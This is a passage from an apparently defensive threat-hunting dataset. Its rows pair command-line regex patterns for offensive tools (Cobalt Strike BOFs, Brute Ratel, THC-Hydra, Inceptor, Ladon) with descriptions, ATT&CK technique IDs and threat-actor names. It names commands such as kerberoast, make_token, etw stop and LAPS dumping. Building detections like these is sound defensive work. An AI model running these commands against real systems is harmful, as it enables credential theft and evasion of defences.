CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63553" "doc.bc.*\.*","doc\.bc\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63554" "doc.md.*\.*","doc\.md\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63555" "doc.po.*\.*","doc\.po\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns 
beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63556" "doc.tx.*\.*","doc\.tx\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63557" "dumpwifi *","dumpwifi\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","63558" "etw stop*","etw\sstop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black 
Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","63559" "fw_walk display*","fw_walk\sdisplay.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63560" "fw_walk status*","fw_walk\sstatus.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63561" "fw_walk total*","fw_walk\stotal.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","63562" "get-spns *","get\-spns\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check 
a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","63563" "hydra -*","hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","63565" "import 
boko*","import\sboko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","0","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","63566" "inceptor*dotnet*","inceptor.{0,25}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","63567" "kerberoast *","kerberoast\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63568" "Ladon Mac * ","Ladon\sMac\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63569" "Lapsdump *","Lapsdump\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","63570" "LdapSignCheck *","LdapSignCheck\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","63572" "list_exports *.dll*","list_exports\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for 
Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63573" "load *.cna","load\s.{0,1000}\.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63574" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63575" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 